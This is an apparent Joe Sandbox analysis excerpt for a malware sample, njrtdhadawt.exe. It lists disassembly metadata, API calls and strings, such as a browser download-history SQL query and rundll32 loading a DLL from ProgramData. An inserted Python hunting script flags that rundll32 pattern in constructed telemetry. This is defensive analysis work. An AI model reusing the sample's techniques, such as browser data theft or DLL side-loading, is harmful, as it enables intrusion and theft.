• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
• String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
• API String ID: 2215929589-2108736111
• Opcode ID: 08b12de7c8cbfb3740470aefedef90929290d38260be980916bc2b66a1d1d0cb
• Instruction ID: f81861766b756977234020a38cbef13edeb3ca3831bb725ef10ae4a784a26d1c
• Opcode Fuzzy Hash: 08b12de7c8cbfb3740470aefedef90929290d38260be980916bc2b66a1d1d0cb
• Instruction Fuzzy Hash: 0E71A672D0015D9ACB50FBA6DC429DDB7B8AF04300F514462FA50B7227DBB97E46ABD0
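The function above references the strings `.dll`, `C:\ProgramData\` and `C:\Windows\system32\rundll32.exe` next to lstrcat and ShellExecute, which is the shape of code that builds a DLL path under ProgramData and hands it to rundll32.exe. The report does not show whether this path is reached at runtime, but the pattern itself (rundll32 loading a DLL from a user-writable directory) is worth a hunt in process-creation telemetry. The following is an added example, not Joe Sandbox code and not code from the sample; the event records, DLL names and Sysmon-style field names (`Image`, `CommandLine`, `ParentImage`, `ProcessId`) are constructed, and the `C:\Users\` and `C:\Windows\Temp\` prefixes are added by assumption beyond the `C:\ProgramData\` the page shows.

```python
"""
Hunting for rundll32.exe loading a DLL from a user-writable directory.
Added example: not Joe Sandbox code and not code from the sample. The
process-creation events below are constructed (Sysmon-style field names).
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

# Directories an unprivileged process can write to. The report's function
# references C:\ProgramData\; the other two prefixes are an assumption.
WRITABLE_DIRS = (
    "c:\\programdata\\",
    "c:\\users\\",
    "c:\\windows\\temp\\",
)


def split_cmdline(cmdline: str) -> list[str]:
    """Minimal Windows argv split: double quotes group, whitespace separates."""
    args: list[str] = []
    cur: list[str] = []
    in_quotes = False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


@dataclass
class Finding:
    pid: int
    parent: str
    dll: str
    entry: Optional[str]
    reason: str


def inspect_event(event: dict) -> Optional[Finding]:
    """Return a Finding when the event is rundll32.exe loading a .dll that
    lives under one of WRITABLE_DIRS, otherwise None."""
    image = event["Image"].lower()
    if not (image == "rundll32.exe" or image.endswith("\\rundll32.exe")):
        return None
    argv = split_cmdline(event["CommandLine"])
    if len(argv) < 2:
        return None
    # rundll32 argument syntax is <dll>[,<entrypoint>] [args...]
    dll, _, entry = argv[1].partition(",")
    dll_lc = dll.lower()
    if not dll_lc.endswith(".dll"):
        return None
    for prefix in WRITABLE_DIRS:
        if dll_lc.startswith(prefix):
            return Finding(
                pid=event["ProcessId"],
                parent=event["ParentImage"],
                dll=dll,
                entry=entry or None,
                reason=f"rundll32 loading DLL from user-writable path {prefix}",
            )
    return None


def scan(events: list[dict]) -> list[Finding]:
    """Run inspect_event over a batch of process-creation events."""
    return [f for f in (inspect_event(e) for e in events) if f is not None]


# Constructed sample telemetry; paths and DLL names are illustrative only.
EVENTS = [
    {"ProcessId": 4120,
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "C:\\Windows\\system32\\rundll32.exe C:\\ProgramData\\update.dll,Start",
     "ParentImage": "C:\\Users\\user\\Desktop\\njrtdhadawt.exe"},
    {"ProcessId": 4133,
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": 4150,
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": '"C:\\Windows\\system32\\rundll32.exe" '
                    '"C:\\Users\\user\\AppData\\Local\\Temp\\upd.dll",DllRegisterServer',
     "ParentImage": "C:\\Windows\\System32\\msiexec.exe"},
    {"ProcessId": 4170,
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe C:\\ProgramData\\notes.txt",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"pid={f.pid} parent={f.parent} dll={f.dll} entry={f.entry}: {f.reason}")
```

The benign `shell32.dll,Control_RunDLL` launch is left alone because the DLL resolves from the system search path rather than a writable prefix; the `C:\Users\` prefix will also catch installer and updater activity, so tune it per environment or pair it with the parent image, which is carried on each Finding so the analyst can pivot to the launching process.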
APIs
• _memset.LIBCMT ref: 00FE8930
• LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?), ref: 00FE8965
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: AllocLocal_memset
• String ID: ERROR_V128$v10$v20
• API String ID: 52611349-1964637325
• Opcode ID: 625c52f039c1b30bc38927f2db646e65ab685aa4499c8f77ceb3ef4f74a209df
• Instruction ID: 20e86fbe0e985cd2b983a17e04cd3df7d6adc77e3c47a6937d7255eb0eab0e04
• Opcode Fuzzy Hash: 625c52f039c1b30bc38927f2db646e65ab685aa4499c8f77ceb3ef4f74a209df
• Instruction Fuzzy Hash: 0E31B372E00148ABDF10AFA6CC41AEE7BB8BF44B60F154125F905EB285DB74AD419B91
Strings
• C:\Users\user\Desktop\njrtdhadawt.exe, xrefs: 6CD6771F
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\njrtdhadawt.exe
• API String ID: 0-1592276734
• Opcode ID: 457e01b26ba4c4de9c967d0a77267d241deb3418913185b4c88be0969f0f2d93
• Instruction ID: b09afffcc21ae0126f1e52c52e24ab4b0c3793d16764dd32f9005db220e4df21
• Opcode Fuzzy Hash: 457e01b26ba4c4de9c967d0a77267d241deb3418913185b4c88be0969f0f2d93
• Instruction Fuzzy Hash: 6C215E71604209BF9B10AF77DC8098BB7A9AF45768F164625E914D7E60E731EC44CBA0
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00FEF2A2
  • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E6FA
  • Part of subcall function 0100E6E5: __CxxThrowException@8.LIBCMT ref: 0100E70F
  • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E720
• std::_Xinvalid_argument.LIBCPMT ref: 00FEF2C1
• _memmove.LIBCMT ref: 00FEF2FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
• String ID: invalid string position$string too long
• API String ID: 3404309857-4289949731
• Opcode ID: c272150b42ea1ccbeff8d2f44727d070972d02c6025760eb659f44c8100fb90e
• Instruction ID: 31e54079eb1364f244920450afb906c3d4f321308b899f0e40ecca6c6e39013a
• Opcode Fuzzy Hash: c272150b42ea1ccbeff8d2f44727d070972d02c6025760eb659f44c8100fb90e
• Instruction Fuzzy Hash: E5110835700241AFDB14EF6ED880969B3A5FF55324B500539F556CB282C370ED48D791
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9F8E84B1,00000000,?,00000000,6CD70110,000000FF,?,6CD656A7,?,?,6CD6567B,?), ref: 6CD65742
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CD65754
• FreeLibrary.KERNEL32(00000000,?,00000000,6CD70110,000000FF,?,6CD656A7,?,?,6CD6567B,?), ref: 6CD65776
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: de56811e66f5dc2fcf7331bb7a65f652ac56e8de4142d2db9f90690d5470e576
• Instruction ID: 3884d29ddb84c667f635403393c52013d6ae2c55b988ebad42665481c159c1e4
• Opcode Fuzzy Hash: de56811e66f5dc2fcf7331bb7a65f652ac56e8de4142d2db9f90690d5470e576
• Instruction Fuzzy Hash: 9901AC31510565EFEB02AF51CC44FAEB7BCFB05755F104626E921E2990D7749504CA90
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FE13F2
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FE13FD
• ReleaseDC.USER32(00000000,00000000), ref: 00FE1406
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: CapsCreateDeviceRelease
• String ID: F(t$DISPLAY
• API String ID: 1843228801-2132287661
• Opcode ID: 4c39be577c221ec9fddfa585cda26cc875742aa1ff2891beb2f176d601def597
• Instruction ID: a9c1e289ba310bcc7ae033ce36d873301eb75de843453cd1c755ae13a6626349
• Opcode Fuzzy Hash: 4c39be577c221ec9fddfa585cda26cc875742aa1ff2891beb2f176d601def597
• Instruction Fuzzy Hash: 5FD012353803027BE2316751BC0EF1A2964E7C6F02F100004F3415C0C846991002A736
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• lstrlenA.KERNEL32(?), ref: 00FE9542
• lstrlenA.KERNEL32(?), ref: 00FE955D
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$lstrcat
• String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
• API String ID: 2500673778-2241552939
APIs
• SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00FFB6F0
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00FFB728
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: File$CreatePointer
• String ID:
• API String ID: 2024441833-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: _freemalloc
• String ID:
• API String ID: 3576935931-0
                                                                                                                                                                                                                                                          • Opcode ID: 1c4ceae8a281b9ab8b8c98597a2d4b677e3591a01e25c8b0aef1b8a59b9b1d5c
                                                                                                                                                                                                                                                          • Instruction ID: 6135a356b6e957794914aa7754bd45eb768d19a79e57f3ce439a56865ebcac75
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c4ceae8a281b9ab8b8c98597a2d4b677e3591a01e25c8b0aef1b8a59b9b1d5c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11A332944616ABFF336B78BC0469D3BD5BF4A2A1F108565F9C99A1D0EA36D8408F90
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,00FE83BD,10000000,00000000,?,00FE83BD,00000000), ref: 00FF233C
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(012C9310,?,00000000,00000104), ref: 00FF2355
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF2367
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF2379
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                          • String ID: %s%s
                                                                                                                                                                                                                                                          • API String ID: 1206339513-3252725368
                                                                                                                                                                                                                                                          • Opcode ID: 3d856f0f5595172b902f3b01100ec24e23d484d9a360b024e53bdfe694c7f7d4
                                                                                                                                                                                                                                                          • Instruction ID: 25008e64546b2db696c54182336ccdc3fd247392a14f40cb241facf1315fbcd1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d856f0f5595172b902f3b01100ec24e23d484d9a360b024e53bdfe694c7f7d4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF0E932100119BFDB111F59EC4CDA7BF6DEF456A5B044125FA08D7210C7B55D109BE5
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 010061C5
                                                                                                                                                                                                                                                            • Part of subcall function 010043F4: __getptd_noexit.LIBCMT ref: 010043F7
                                                                                                                                                                                                                                                            • Part of subcall function 010043F4: __amsg_exit.LIBCMT ref: 01004404
                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 010061DC
                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 010061EA
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 010061FA
                                                                                                                                                                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0100620E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 938513278-0
                                                                                                                                                                                                                                                          • Opcode ID: 20afbc787947e098c55e0a3da01cb6fac01daa894a82a16a12d84bb412ca98f3
                                                                                                                                                                                                                                                          • Instruction ID: a9cb5baec734e5904e95e0c990247f090b9a3b9a81cb1704371058d6a4c2edc8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20afbc787947e098c55e0a3da01cb6fac01daa894a82a16a12d84bb412ca98f3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83F02432E403019BFB63FB7C98027DE37E1AF10760F084269E1C0AB1D2CB3A9550EA49
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6CD4C710: setsockopt.WS2_32(?,00000006,00000001,00000004,00000004), ref: 6CD4C72F
                                                                                                                                                                                                                                                            • Part of subcall function 6CD4C710: WSAGetLastError.WS2_32(?,00000004,00000020), ref: 6CD4C73C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 6CD1F76A
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 6CD1F7A8
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 6CD1FA6C
Strings
• a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs, xrefs: 6CD1FA3D
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: closesocket$ErrorLastsetsockopt
• String ID: a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
• API String ID: 1009131482-2006489008
• Opcode ID: 0ee9b299cefcb8493263cfd39cb6f46757614c9ad5f37ae57804e45480dd1372
• Instruction ID: 204985034664a66bdd3696711f6c6de2ae3b94e7d2b9d3303036901813d22851
• Opcode Fuzzy Hash: 0ee9b299cefcb8493263cfd39cb6f46757614c9ad5f37ae57804e45480dd1372
• Instruction Fuzzy Hash: D82256B1504B41DBE320CF25D885B97BBF5BB08318F008A1DD9AA87BA1E775F548CB91
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
